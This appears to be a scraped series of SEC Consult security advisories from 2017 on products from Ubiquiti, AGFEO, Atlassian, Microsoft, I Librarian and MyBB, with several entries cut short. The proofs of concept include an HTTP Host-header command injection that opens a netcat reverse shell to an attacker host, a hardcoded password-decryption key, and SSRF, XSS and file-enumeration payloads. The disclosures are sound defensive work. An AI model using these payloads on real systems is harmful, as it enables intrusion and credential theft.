Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF Jasveer Singh / @2017
signature.asc
Description: OpenPGP digital signature
SEC Consult SA-20170804-1 :: Ubiquiti Networks UniFi Cloud Key authenticated command injection
SEC Consult Vulnerability Lab Security Advisory < 20170804-1 >
===
title: Authenticated Command Injection
product: Ubiquiti Networks UniFi Cloud Key
vulnerable version: Firmware v0.6.1
fixed version: Firmware v0.6.4
CVE number:
impact: High
homepage: https://www.ubnt.com
found: 2017-03-26
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"Ubiquiti Networks develops high-performance networking
technology for service providers and enterprises. Our technology
platforms focus on delivering highly advanced and easily deployable
solutions that appeal to a global customer base in underserved and
underpenetrated markets."
Source: http://ir.ubnt.com/
Business recommendation:
SEC Consult recommends not to use this device in production until a thorough
security review has been performed by security professionals and all
identified issues have been resolved.
Vulnerability overview/description:
---
A command injection can be triggered via the hostname header in the status GET
request. This vulnerability can be exploited when the Cloud Key web interface
is exposed to the Internet and an attacker has credentials to it.
Proof of concept:
-
The following PHP snipplet is responsible for the command execution
vulnerability:
(api.inc, line 265)
---
[...]
function is_unifi_running() {
if (!isset($_SERVER['HTTP_HOST'])) {
$c_host = $_SERVER['SERVER_ADDR'];
} else {
$c_host = $_SERVER['HTTP_HOST'];
}
$unifi_href = 'http://' . $c_host . ':8080/status';
exec(CMD_CURL . $unifi_href, $out, $rc);
if ($rc == 0) {
return true;
}
return false;
}
[...]
---
Since '$c_host' is not filtered, a command injection is possible.
The following GET request was used to open a reverse-shell via command injection
from the Cloud Key system (192.168.0.30) to the attacker (192.168.0.3):
---
GET /api/status HTTP/1.1
Host: 192.168.0.30;busybox nc 192.168.0.3 8999 -e bash;
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
X-Access-Token:
Referer: https://192.168.0.30/login
Cookie: CKSESSIONID=
Connection: close
---
As the listener, netcat was used:
$ nc -lvp 8999
Vulnerable / tested versions:
-
Ubiquiti Networks UniFi Cloud Key version 0.6.1 has been tested. This version
was the latest at the time the security vulnerabilities were discovered.
Vendor contact timeline:
2017-03-29: Contacting vendor via HackerOne. Vendor sets status to
"Triaged".
2017-04-24: Asking for a status update; No answer.
2017-05-06: Found update 0.6.4 on the website of the vendor.
2017-05-15: Contacted vendor via e-mail and asked for status.
2017-05-16: Vendor closed the ticked and changed the status to resolved.
Current firmware version was v0.6.4. Set the publication
date to 2017-08-04 (at least 90 days after fix).
2017-08-04: Public release of security advisory
Solution:
-
Upgrade to v0.6.4 or above.
Workaround:
---
None
Advisory URL:
-
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
SEC Consult SA-20170724-0 :: Cross-Site Scripting (XSS) issue in multiple Ubiquiti Networks products
SEC Consult Vulnerability Lab Security Advisory < 20170724-0 >
===
title: Cross-Site Scripting (XSS)
product: Ubiquiti Networks EP-R6, ER-X, ER-X-SFP
vulnerable version: Firmware v1.9.1
fixed version: Firmware v1.9.1.1
CVE number:
impact: Medium
homepage: https://www.ubnt.com
found: 2017-04-04
by: R. Freingruber, T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"Ubiquiti Networks develops high-performance networking
technology for service providers and enterprises. Our technology
platforms focus on delivering highly advanced and easily deployable
solutions that appeal to a global customer base in underserved and
underpenetrated markets."
Source: http://ir.ubnt.com/
Business recommendation:
SEC Consult recommends not to use this device in production until a thorough
security review has been performed by security professionals and all
identified issues have been resolved.
Vulnerability overview/description:
---
1) Reflected Cross Site Scripting (XSS) in Internet Explorer
This vulnerability can be exploited by deactivating or bypassing the
integrated XSS-filter of the Internet Explorer.
A reflected cross site scripting vulnerability was identified because of an
initialization error in "/files/index/". An attacker can exploit this
vulnerability by tricking a victim to visit a malicious website. The attacker
is able to hijack the session of the attacked user. If the user is currently
not logged in, the injected JavaScript code can start a bruteforce attack
(for example, with the default credentials ubnt:ubnt). After a session has
been established, the code has full control over the system via the CLI feature
which is basically a shell wrapper. By abusing this vulnerability an attacker
can open ports on the router or start a reverse shell.
Proof of concept:
-
1) Reflected Cross Site Scripting (XSS) in Internet Explorer
The following URL can be used as PoC:
https://192.168.1.1/files/index/0/aaa
SEC Consult SA-20170724-1 :: Open Redirect issue in multiple Ubiquiti Networks products
SEC Consult Vulnerability Lab Security Advisory < 20170724-1 >
===
title: Open Redirect in Login Page
product: Multiple Ubiquiti Networks products, e.g.
TS-16-CARRIER, TS-5-POE, TS-8-PRO, AG-HP-2G16,
AG-HP-2G20, AG-HP-5G23, AG-HP-5G27, AirGrid M,
AirGrid M2, AirGrid M5, AR, AR-HP, BM2HP, BM2-Ti,
BM5HP, BM5-Ti, LiteStation M5, locoM2, locoM5,
locoM9, M2, M3, M365, M5, M900, NB-2G18, NB-5G22,
NB-5G25, NBM3, NBM365, NBM9, NSM2, NSM3, NSM365,
NSM5, PBM10, PBM3, PBM365, PBM5, PICOM2HP,
Power AP N
vulnerable version: AirOS 6.0.1 (XM), 1.3.4 (SW)
fixed version: AirOS 6.0.3 (XM), 1.3.5 (SW)
CVE number:
impact: Low
homepage: https://www.ubnt.com/
found: 2017-03-22
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"Ubiquiti Networks develops high-performance networking
technology for service providers and enterprises. Our technology
platforms focus on delivering highly advanced and easily deployable
solutions that appeal to a global customer base in underserved and
underpenetrated markets."
Source: http://ir.ubnt.com/
Business recommendation:
SEC Consult recommends not to use the devices in production until a thorough
security review has been performed by security professionals and all
identified issues have been resolved.
Vulnerability overview/description:
---
1) Open Redirect in Login Page - HackerOne #158287
A open redirect vulnerability can be triggered by luring an attacked user to
authenticate to a Ubiquiti AirOS device by clicking on a crafted link.
This vulnerability was found earlier by another bug bounty participant
on HackerOne. It was numbered with #158287.
Proof of concept:
-
http:///login.cgi?uri=https://www.sec-consult.com
After a successful login, the user will be redirected to
https://www.sec-consult.com.
Vulnerable / tested versions:
-
Ubiquiti Networks AirRouter (v6.0.1)
Ubiquiti Networks TS-8-PRO (v1.3.4)
Based on information embedded in the firmware of other Ubiquiti products
gathered from our IoT Inspector tool we believe the following devices are
affected as well:
Ubiquiti Networks LBE-M5-23 (Version: XW v6.0.1)
Ubiquiti Networks NBE-M2-13 (Version: XW v6.0.1)
Ubiquiti Networks NBE-M5-16 (Version: XW v6.0.1)
Ubiquiti Networks NBE-M5-19 (Version: XW v6.0.1)
Ubiquiti Networks PBE-M2-400 (Version: XW v6.0.1)
Ubiquiti Networks PBE-M5-300 (Version: XW v6.0.1)
Ubiquiti Networks PBE-M5-300-ISO (Version: XW v6.0.1)
Ubiquiti Networks PBE-M5-400 (Version: XW v6.0.1)
Ubiquiti Networks PBE-M5-400-ISO (Version: XW v6.0.1)
Ubiquiti Networks PBE-M5-620 (Version: XW v6.0.1)
Ubiquiti Networks RM2-Ti (Version: XW v6.0.1)
Ubiquiti Networks RM5-Ti (Version: XW v6.0.1)
Vendor contact timeline:
2017-03-22: Contacting vendor via HackerOne.
2017-03-22: Vendor marked open redirect as duplicate to: #158287
The contact also states that this issue will be resolved
in the next release.
2017-05-05: Found updates (6.0.3 and 1.3.5) on the website of the vendor
and confirmed the fix - provide at least 90 days for
customers to apply the patch.
2017-05-15: Contacted vendor via e-mail and set the publication date
to 2017-07-24.
2017-07-24: Public release of security advisory
Solution:
-
Upgrade to firmware version 6.0.3 (XM), 1.3.5 (SW) or later.
Workaround:
---
No workaround
Advisory URL:
-
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin - Linz - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of
SEC Consult SA-20170712-0 :: Multiple critical vulnerabilities in AGFEO smart home ES 5xx/6xx products
SEC Consult Vulnerability Lab Security Advisory < 20170712-0 >
===
title: Multiple critical vulnerabilities
product: AGFEO Smart Home ES 5xx
AGFEO Smart Home ES 6xx
vulnerable version: at least 1.9b, 1.10
fixed version: 1.12c
CVE number: -
impact: Critical
homepage: https://www.agfeo.de/
found: 2016-12-28
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
AGFEO GmbH & Co. KG is a vendor of telephone systems and other
(tele-)communication products like DECT phones, headsets or smart home
products as well.
Business recommendation:
The available patches should be installed immediately.
SEC Consult recommends not to use this product in a production environment
until a thorough security review has been performed by security professionals
as there are indications for further security issues.
Vulnerability overview/description:
---
1) Unauthenticated access to web services and authentication bypass
A web service with multiple scripts for debug purposes is accessible
on an unusual port on the device. There is also a script to read files from
the filesystem. As the web service runs with root privileges all files
on the operating system can be read by an attacker. This only affects the
ES 5xx product line, all other vulnerabilities affect both ES 5xx and 6xx.
The configuration of the device can be changed and arbitrary updates can be
uploaded as well as music files for the answering machine. By reading the
database content, the usernames and their passwords can be revealed and easily
decrypted. This way the administrator password can be dumped from the database
and the device can be fully administrated by an attacker.
The normal user interface has an additional development subfolder which was
probably used during the development process. Updates can be triggered from
this sub platform and log files, statistics and states can also be displayed.
2) Unauthenticated access to configuration ports
Multiple different instances of TCP services are present on the device. Each
of the listening sockets is forked from a debug and configuration service.
Internal device information can be read from the device. Among other commands,
the configuration of the device can also be altered by using these services.
3) Hardcoded cryptographic keys
Three certificates including their private keys are embedded in the firmware
of AGFEO ES 5xx/6xx SmartHome products. The certificates and keys in both
product lines are exactly the same. One certificate is used for HTTPS
(default server certificate for web based configuration and management).
Impersonation, man-in-the-middle or passive decryption attacks are possible.
These attacks allow an attacker to gain access to sensitive information like
admin credentials and use them in further attacks.
4) Multiple reflected cross site scripting (XSS) vulnerabilities
The ES 5xx SmartHome products are vulnerable to reflected cross site scripting.
Malicious JavaScript code can be executed in the browser of a victim by luring
to a handcrafted link. This is possible even if the victim is not logged in.
It is assumed that the 6xx products are affected as well but those could not be
tested.
Proof of concept:
-
1) Unauthenticated access to web services and authentication bypass
The debug web service is available by using the following url:
http://:20011/index.html
There are different scripts accessible, the following actions can be executed:
-) Change IP configuration
-) Change time zone
-) Upload updates (Any files can be uploaded to the device!)
-) Read all files on the filesystem
-) Play, delete and move voice messages on all mail boxes
-) Converting mp3 files to wav files
-) List all connected phones and the related numbers
The SQLite database is located under "/home/profile/poolstore.db". By reading
this file the usernames and passwords can be dumped. The passwords are encoded
with base64 and encrypted with XOR. To decrypt the XOR'ed password the
following key has to be used:
"0x42 0xab 0xce 0xfa 0x54 0xed 0xcf 0xba"
The function to decrypt the password was found in the php script "login.php":
function decodePassword($PasswordEnc)
{
$PasswordBinaryEncBase64 = "";
$PasswordBinaryEnc="";
$PasswordBinary = array();
$Password = "
SEC Consult SA-20170630-0 :: Multiple critical vulnerabilities in OSCI-Transport library 1.2 for German e-Government
We have published an accompanying blog post to this technical advisory with
further information:
German version with less technical details as an overview:
http://blog.sec-consult.com/2017/06/e-government-in-deutschland-schwachstellen.html
English version containing more detailed attack scenario descriptions:
http://blog.sec-consult.com/2017/06/german-e-government-details-vulnerabilities.html
SEC Consult Vulnerability Lab Security Advisory < 20170630-0 >
===
title: Multiple critical vulnerabilities
product: OSCI-Transport library 1.2 for German e-Government
vulnerable version: 1.6.1
fixed version: 1.7.1
CVE number: CVE-2017-10668 (Padding Oracle)
CVE-2017-10669 (Signature Wrapping)
CVE-2017-10670 (XXE)
impact: Critical
homepage: http://www.xoev.de
found: 01/2017
by: Wolfgang Ettlinger (Office Vienna)
Marc Nimmerrichter (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"Mit der Spezifikation des Protokolls OSCI-Transport in der Version 1.2 wird
ein sicheres, herstellerunabhängiges und interoperables Datenaustauschformat
beschrieben.
Um die Implementierung für Anwender in der öffentlichen Verwaltung sowie der
Fachverfahrenshersteller zu erleichtern, wird die OSCI 1.2 Bibliothek angeboten:
Die Bibliothek implementiert OSCI-Transport in der Version 1.2 und ist damit
unabhängig von Fachinhalten. Sie ist Bestandteil der OSCI-Transport
Infrastruktur. Die OSCI-Transport-Bibliothek soll in Fachverfahren
(auf Verwaltungsseite) oder Clientsystemen (auf Kundenseite) implementiert
werden."
URL:
http://www.xoev.de/die_standards/osci_transport/osci_transport_1_2/osci_1_2_bibliothek-2310
Business recommendation:
During a short security test, SEC Consult found several severe security
vulnerabilities in the OSCI 1.2 Transport library.
The OSCI 1.2 Transport library is intended to provide a secure message exchange
channel over an untrusted network (i.e. the Internet) for German government
agencies for eGovernment.
However, SEC Consult found that multiple vulnerabilities allow attackers to
decrypt encrypted messages as well as modify signed messages. Moreover, a
vulnerability can be used to read arbitrary files from any host that implements
the OSCI 1.2 transport protocol using this library.
SEC Consult recommends KoSIT and its partners to _immediately_ stop using the
OSCI 1.2 Transport library over untrusted networks. Moreover, a forensic
investigation should be conducted on all affected systems to investigate
whether the vulnerabilities have been exploited in the past.
The library should only be used again after a thorough source code security
review has been conducted and all vulnerabilities have been fixed. It is
quite likely that further vulnerabilities exist as there are indications for
potential XML injection flaws.
Vulnerability overview/description:
---
1) External Entity Injection (XXE) [CVE-2017-10670]
By sending manipulated XML data to any communication partner, an attacker is
able to conduct an XXE attack on the receiving system. This attack allows an
attacker to read arbitrary files from the file system of the victim host or to
conduct a denial of service attack.
2) Padding Oracle Attack [CVE-2017-10668]
The OCSI 1.2 Transport library only supports the following encryption
algorithms:
* http://www.w3.org/2001/04/xmlenc#tripledes-cbc
* http://www.w3.org/2001/04/xmlenc#aes128-cbc
* http://www.w3.org/2001/04/xmlenc#aes192-cbc
* http://www.w3.org/2001/04/xmlenc#aes256-cbc
All of these algorithms are no longer recommended by the W3C:
"Note: Use of AES GCM is strongly recommended over any CBC block encryption
algorithms as recent advances in cryptanalysis [...] have cast doubt on the
ability of CBC block encryption algorithms to protect plain text when used with
XML Encryption" (https://www.w3.org/TR/xmlenc-core1/)
Since the supported cipher algorithms do not provide protection against
modification (malleability) and the library reveals in an error message whether
decryption failed (error code 9202), SEC Consult was able to conduct a padding
oracle attack. This attack allows an attacker to bypass transport encryption.
3) Signature Wrapping attack [CVE-2017-10669]
By moving XML elements within the document tree, a signature wrapping attack can
be conducted. This allows an attacker to modify the co
SEC Consult SA-20170613-0 :: Access Restriction Bypass in Atlassian Confluence
SEC Consult Vulnerability Lab Security Advisory < 20170613-0 >
===
title: Access Restriction Bypass
product: Atlassian Confluence
vulnerable version: 4.3.0 - 6.1.1
fixed version: 6.2.1
CVE number: -
impact: Medium
homepage: https://www.atlassian.com/
found: 2017-03-27
by: Mathias Frank (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"In 2002, our founders, Scott Farquhar and Mike Cannon-Brookes, set
conventional wisdom on its ear by launching a successful enterprise
software company with no sales force. From Australia. Our first product, JIRA,
proved that if you make a great piece of software, price it right, and make
it available to anyone to download from the internet, teams will come. And
they'll build great things with it. And they'll tell two friends, and so on,
and so on.
Today a lot has changed. We're over 1,700 Atlassians (and growing), in six
locations, with products to help all types of teams realize their visions and
get stuff done. But the fundamentals remain the same. We're for teams because
we believe that great teams can do amazing things. We're not afraid to do
things differently. And we're driven by an inspiring set of values that shape
our culture and our products for the better."
Source: https://www.atlassian.com/company
Business recommendation:
SEC Consult recommends to upgrade to the latest version available which fixes
the identified issue.
Vulnerability overview/description:
---
1) Access Restriction Bypass
The "watch" functionality provides a user the option to subscribe to specific
content. Furthermore, the user gets a notification for any new comment made to
the
previously subscribed content.
A user can manually subscribe to pages which he is not able to view and he then
receives any further comment made on the restricted page.
Proof of concept:
-
1) Access Restriction Bypass
Prerequisite as admin user just for a proof of concept demo page:
* Create a Space "Demo Space" visible for every user and group
* Create a Page "Demo Page" (example pageID: 1048582) and restrict the
"Viewing and editing restriction" to only the administrator group/user with
the "/pages/getcontentpermissions.action" function.
Send the following request as user:
--
POST /users/addpagenotificationajax.action HTTP/1.1
Host: localhost:8090
Referer: http://localhost:8090/display/ds/Welcome+to+Confluence
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
[...]
pageId=1048582_token=1b5ee6615c44e4067679ccfa6e5904f0e42e8eb7
--
Then the user is subscribed to the "Demo Page" and receives a notification and
is
able to receive any further comments made on the subscribed page.
Vulnerable / tested versions:
-
The following version has been tested by SEC Consult
Atlassian Confluence version 5.9.14 and 6.1.1
Atlassian believes that versions beginning from 4.3.0 before 6.2.1 are affected.
Vendor contact timeline:
2017-04-03: Contacting vendor through secur...@atlassian.com
2017-04-05: Vendor confirmed the vulnerability and issued the references
CONFSERVER-52241 (Confluence Server) and CONFCLOUD-54634 (Confluence
Cloud)
2017-04-13: Vendor fixed the issue CONFCLOUD-54634.
2017-05-11: Asked for planned timeline and release of an fix for
CONFSERVER-52241.
2017-05-29: Vendor released a fix for CONFSERVER-52241 with version 6.2.1.
2017-06-08: Vendor prepares a sanitised copy of CONFSERVER-52241 for release
along
with the advisory -
https://jira.atlassian.com/browse/CONFSERVER-52560
2017-06-13: Public release of advisory.
Solution:
-
Upgrade to version 6.2.1 available at:
https://www.atlassian.com/software/confluence/download
The effectiveness of the fix was verified by the SEC Consult Vulnerability Lab.
https://jira.atlassian.com/browse/CONFSERVER-52560
Workaround:
---
Disable workbox notifications as per the instructions found at
https://confluence.atlassian.com/doc/configuring-workbox-notifications-301663830.html
Advisory URL:
-
SEC Consult SA-20170510-0 :: Insecure Handling Of URI Schemes in Microsoft OneDrive iOS App
A short demo video is available here:
https://youtu.be/0jZdM9peVSk
SEC Consult Vulnerability Lab Security Advisory < 20170510-0 >
===
title: Insecure Handling Of URI Schemes
product: Microsoft OneDrive iOS App
vulnerable version: 8.13
fixed version: 8.14
impact: Medium
homepage: https://onedrive.live.com/
found: 2017-04-10
by: S. Tripathy (Office Singapore)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"Do more wherever you go with Microsoft OneDrive. Get to and share your
documents, photos, and other files from your iOS device, computer (PC or
Mac), and any other devices you use. Use the Office mobile apps to stay
productive and work together, no matter where you are. The OneDrive app
for iOS lets you easily work with your personal and work files when
you're on the go."
Source:
https://itunes.apple.com/us/app/microsoft-onedrive-file-photo-cloud-storage/id477537958?mt=8
Business recommendation:
SEC Consult recommends to implement a proper validation to handle the URI
schemes. Always ask for user permission before calling an external URI scheme.
Vulnerability overview/description:
---
1) Insecure Handling of URI Schemes
Due to the lack of URI schemes validation any external URI scheme can be
invoked by the Microsoft OneDrive iOS application with out any user
interaction.
Proof of concept:
-
1) Insecure Handling of URI Schemes
An attacker can upload and share a malicious HTML file to invoke an
external URI scheme. Once the file is accessed by any OneDrive user with
an iOS device, the external URI scheme will be invoked automatically.
Example of a malicious HTML file:
click
var t = document.getElementById("callme");
var fe = document.createEvent("MouseEvents");
fe.initEvent("click", true, true);
t.dispatchEvent(fe);
=
Vulnerable / tested versions:
-
The following version is affected by the identified vulnerability which
was the most recent version at the time of discovery:
Microsoft OneDrive iOS application v8.13
Vendor contact timeline:
2017-04-11: Contacting vendor through sec...@microsoft.com
2017-04-12: Vendor confirmed the vulnerability.
2017-04-21: Vendor released the updated version.
2017-05-10: Public release of advisory.
Solution:
-
SEC Consult recommends to implement a proper validation to handle
the URI schemes. Always ask for user permission before calling a URI scheme.
Update to OneDrive v8.14
https://itunes.apple.com/us/app/microsoft-onedrive-file-photo-cloud-storage/id477537958?mt=8
Workaround:
---
None
Advisory URL:
-
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF Siddhartha Tripathy / @2017
smime.p7s
Description: S/MIME Cryptographic Signature
SEC Consult SA-20170509-0 :: Multiple vulnerabilities in I, Librarian PDF manager
SEC Consult Vulnerability Lab Security Advisory < 20170509-0 >
===
title: Multiple vulnerabilities
product: I, Librarian PDF manager
vulnerable version: <=4.6 & 4.7
fixed version: 4.8
CVE number: -
impact: Critical
homepage: https://i-librarian.net/
found: 2017-01-30
by: Wan Ikram (Office Kuala Lumpur)
Fikri Fadzil (Office Kuala Lumpur)
Jasveer Singh (Office Kuala Lumpur)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"I, Librarian is a PDF manager or PDF organizer, which enables researchers,
scholars, or students to create an annotated collection of PDF articles. If
used as a groupware, users may build their virtual library collaboratively,
sharing the workload of literature mining. I, Librarian will make your work
with scientific literature incredibly efficient."
Source: https://i-librarian.net/
Business recommendation:
By combining the vulnerabilities documented in this advisory an attacker can
fully compromise the web server which has the "I, Librarian" software installed.
SEC Consult recommends to install the latest version available immediately and
perform a thorough security review of this software.
Vulnerability overview/description:
---
The application doesn't apply proper validation on some user inputs. As a
result, below vulnerabilities can be exploited by authenticated attackers with
any roles to fully compromise the system.
1. OS Command Injection
Arbitrary OS commands are possible to be executed from "batchimport.php". This
is a serious vulnerability as the chances for the web server to be fully
compromised are very high.
2. Server-Side Request Forgery
This vulnerability allows an attacker to send HTTP requests originating from the
web server. As some functions in the web application require requests to
be done from localhost, the risk for this vulnerability is considered high.
3. Directory Enumeration
It is possible to enumerate all directories in any directory on the server
through
"jqueryFileTree.php".
4. Reflected Cross Site Scripting
This vulnerability was found in "temp.php". It allows an attacker to inject
malicious client side scripting which will be executed in the browser of users
if they visit the manipulated site.
Proof of concept:
-
1. OS Command Injection
Below is the detail of a HTTP request that needs to be sent to execute arbitrary
OS commands through "batchimport.php":
URL : http://$DOMAIN/batchimport.php
METHOD : GET
PAYLOAD : directory=.==""
2. Server-Side Request Forgery
Below shows an example of the exploitation for this vulnerability. An attacker
can reset any user's password which by design requires the request to be sent
from localhost.
URL : http://$DOMAIN/ajaxsupplement.php
METHOD : POST
PAYLOAD :
form_new_file_link=http://$DOMAIN/resetpassword.php?username=_password1=_password2=
3. Directory Enumeration
Available directories can be enumerated simply by navigating through the "dir"
parameter in "jqueryFileTree.php".
URL : http://$DOMAIN/jqueryFileTree.php
METHOD : POST
PAYLOAD : dir=
4. Reflected Cross Site Scripting
The following payload shows a simple alert message box:
URL : http://$DOMAIN/temp.php
METHOD : GET
PAYLOAD : tempfile=alert(42)
Vulnerable / tested versions:
-
"I, Librarian" version 4.6 has been tested. This version was the latest
at the time the security vulnerabilities were discovered. It is assumed
that previous versions are affected as well.
Vendor contact timeline:
2017-01-31: Contacting vendor through supp...@i-librarian.net
2017-01-31: Vendor replied with their PGP public key.
2017-02-03: Provided encrypted advisory and proof of concept to the vendor.
2017-02-09: Patch released, version 4.7.
2017-02-21: Informed vendor on some issues which were not addressed correctly.
2017-03-30: Patch released by the vendor - I, Librarian version 4.8.
2017-05-09: Public release of advisory
Solution:
-
Upgrade to I, Librarian 4.8
For further information see:
https://i-librarian.net/article.php?id=9
Workaround:
---
None
Advisory URL:
-
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~
SEC Consult SA-20170407-0 :: Server-Side Request Forgery in MyBB forum
SEC Consult Vulnerability Lab Security Advisory < 20170407-0 >
===
title: Server Side Request Forgery (SSRF) Vulnerability
product: MyBB
vulnerable version: 1.8.10
fixed version: 1.8.11
CVE number: CVE-2017-7566
impact: Medium
homepage: https://mybb.com/
found: 2017-03-03
by: Wan Ikram (Office Kuala Lumpur)
Fikri Fadzil (Office Kuala Lumpur)
Jasveer Singh (Office Kuala Lumpur)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"With everything from forums to threads, posts to private messages, search to
profiles, and reputation to warnings, MyBB features everything you need to run
an efficient and captivating community. Through plugins and themes, you can
extend MyBB's functionality to build your community exactly as you'd like it."
Source: https://mybb.com/
Business recommendation:
The patch should be installed immediately if cURL functions are disabled.
Furthermore, SEC Consult recommends to perform a thorough security review of
this software.
Vulnerability overview/description:
---
1. Server-Side Request Forgery
An attacker is able to initiate socket connections with arbitrary systems using
the internal network interface of the server via the web application's "Change
Avatar" function. This vulnerability can be used to identify internal hosts and
perform internal port scanning.
Proof of concept:
-
1. Server-Side Request Forgery
This vulnerability can be exploited by an attacker with a registered account
as low as a normal account. If the server which is hosting the web application
disallows cURL functions, the application will use the "fsockopen" function as
an
alternative. Below is the example on how the SSRF issue can be exploited.
URL : http://$DOMAIN/usercp.php
METHOD : POST
PAYLOAD : avatarurl=http://$IP:$PORT:80
Vulnerable / tested versions:
-
MyBB version 1.8.10 has been tested. This version was the latest version
at the time the security vulnerability was discovered.
Vendor contact timeline:
2017-03-09: Contacting vendor through the "Private Inquiries" forum at
https://community.mybb.com/forum-135.html
2017-03-09: Advisory sent through the "Private Inquiries". Vendor has
confirmed the issues. No specific date on the fix was given
2017-03-17: Vendor confirmed the vulnerability; working on the fix
2017-03-31: Requesting a status update.
2017-04-04: Patch released by the vendor.
2017-04-07: Public release of advisory.
Solution:
-
Upgrade to MyBB 1.8.11
For further information see:
https://blog.mybb.com/2017/04/04/mybb-1-8-11-merge-system-1-8-11-release/
Workaround:
---
None
Advisory URL:
-
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF Fikri Fadzil / @2017
smime.p7s
Description: S/MIME Cryptographic Signature
SEC Consult SA-20170403-0 :: Misbehavior of PHP fsockopen function
SEC Consult Vulnerability Lab Security Advisory < 20170403-0 >
===
title: Misbehavior of the "fsockopen" function
product: PHP
vulnerable version: 7.1.2
fixed version:
CVE number: CVE-2017-7272
impact: Medium
homepage: http://www.php.net/
found: 2017-03-06
